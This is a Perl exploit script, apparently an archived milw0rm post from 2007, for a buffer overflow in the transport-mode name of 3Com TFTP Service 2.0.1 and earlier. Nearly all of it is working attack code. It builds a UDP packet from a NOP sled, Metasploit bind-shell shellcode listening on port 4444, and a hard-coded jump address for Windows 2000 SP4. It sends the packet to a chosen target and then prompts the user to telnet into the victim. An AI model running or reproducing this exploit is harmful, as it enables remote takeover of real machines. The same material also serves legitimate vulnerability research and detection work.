#!/usr/bin/perl -w # =============================================================================================== # 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Perl Exploit # By Umesh Wanve (umesh_345@yahoo.com) # ============================================================================================== # Credits : Liu Qixu is credited with the discovery of this vulnerability. # # Reference : http://www.securityfocus.com/bid/21301 # # Date : 27-02-2007 # # Tested on Windows 2000 SP4 Server English # Windows 2000 SP4 Professional English # # You can replace shellcode with your favourite one :) # # # Buffer overflow exists in transporting mode name of TFTP server. # # So here you go. # # Buffer = "\x00\x02" + "filename" + "\x00" + nop sled + Shellcode + JUMP + "\x00"; # # # This was written for educational purpose. Use it at your own risk.Author will be not be responsible for any damage. # # # #=============================================================================================== use IO::Socket; if(!($ARGV[1])) { print "\n3COM Tftp long transport name exploit\n"; print "\tCoded by Umesh wanve\n\n"; print "Use: 3com_tftp.pl \n\n"; exit; } $target = IO::Socket::INET->new(Proto=>'udp', PeerAddr=>$ARGV[0], PeerPort=>$ARGV[1]) or die "Cannot connect to $ARGV[0] on port $ARGV[1]"; # win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com my($shellcode)= "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x48". "\xc8\xb3\x54\x83\xeb\xfc\xe2\xf4\xb4\xa2\x58\x19\xa0\x31\x4c\xab". "\xb7\xa8\x38\x38\x6c\xec\x38\x11\x74\x43\xcf\x51\x30\xc9\x5c\xdf". "\x07\xd0\x38\x0b\x68\xc9\x58\x1d\xc3\xfc\x38\x55\xa6\xf9\x73\xcd". "\xe4\x4c\x73\x20\x4f\x09\x79\x59\x49\x0a\x58\xa0\x73\x9c\x97\x7c". "\x3d\x2d\x38\x0b\x6c\xc9\x58\x32\xc3\xc4\xf8\xdf\x17\xd4\xb2\xbf". "\x4b\xe4\x38\xdd\x24\xec\xaf\x35\x8b\xf9\x68\x30\xc3\x8b\x83\xdf". "\x08\xc4\x38\x24\x54\x65\x38\x14\x40\x96\xdb\xda\x06\xc6\x5f\x04". "\xb7\x1e\xd5\x07\x2e\xa0\x80\x66\x20\xbf\xc0\x66\x17\x9c\x4c\x84". "\x20\x03\x5e\xa8\x73\x98\x4c\x82\x17\x41\x56\x32\xc9\x25\xbb\x56". "\x1d\xa2\xb1\xab\x98\xa0\x6a\x5d\xbd\x65\xe4\xab\x9e\x9b\xe0\x07". "\x1b\x9b\xf0\x07\x0b\x9b\x4c\x84\x2e\xa0\xa2\x08\x2e\x9b\x3a\xb5". "\xdd\xa0\x17\x4e\x38\x0f\xe4\xab\x9e\xa2\xa3\x05\x1d\x37\x63\x3c". "\xec\x65\x9d\xbd\x1f\x37\x65\x07\x1d\x37\x63\x3c\xad\x81\x35\x1d". "\x1f\x37\x65\x04\x1c\x9c\xe6\xab\x98\x5b\xdb\xb3\x31\x0e\xca\x03". "\xb7\x1e\xe6\xab\x98\xae\xd9\x30\x2e\xa0\xd0\x39\xc1\x2d\xd9\x04". "\x11\xe1\x7f\xdd\xaf\xa2\xf7\xdd\xaa\xf9\x73\xa7\xe2\x36\xf1\x79". "\xb6\x8a\x9f\xc7\xc5\xb2\x8b\xff\xe3\x63\xdb\x26\xb6\x7b\xa5\xab". "\x3d\x8c\x4c\x82\x13\x9f\xe1\x05\x19\x99\xd9\x55\x19\x99\xe6\x05". "\xb7\x18\xdb\xf9\x91\xcd\x7d\x07\xb7\x1e\xd9\xab\xb7\xff\x4c\x84". "\xc3\x9f\x4f\xd7\x8c\xac\x4c\x82\x1a\x37\x63\x3c\xb8\x42\xb7\x0b". "\x1b\x37\x65\xab\x98\xc8\xb3\x54"; print "++ Building Malicous Packet .....\n"; $nop="\x90" x 129; $jmp_2000 = "\x0e\x08\xe5\x77"; # jmp esi user32.dll windows 2000 sp4 english (on 27-02-2007) $exploit = "\x00\x02"; #write request (header) $exploit=$exploit."A"; #file name $exploit=$exploit."\x00"; #Start of transporting name $exploit=$exploit.$nop; #nop sled to land into shellcode $exploit=$exploit.$shellcode; #our Hell code $exploit=$exploit.$jmp_2000; #jump to shellcode $exploit=$exploit."\x00"; #end of TS mode name print $target $exploit; #Attack on victim print "++ Exploit packet sent ...\n"; print "++ Done.\n"; print "++ Telnet to 4444 on victim's machine ....\n"; sleep(2); close($target); exit; #------------------------------------------------------------------------------------------------------------ # milw0rm.com [2007-02-28]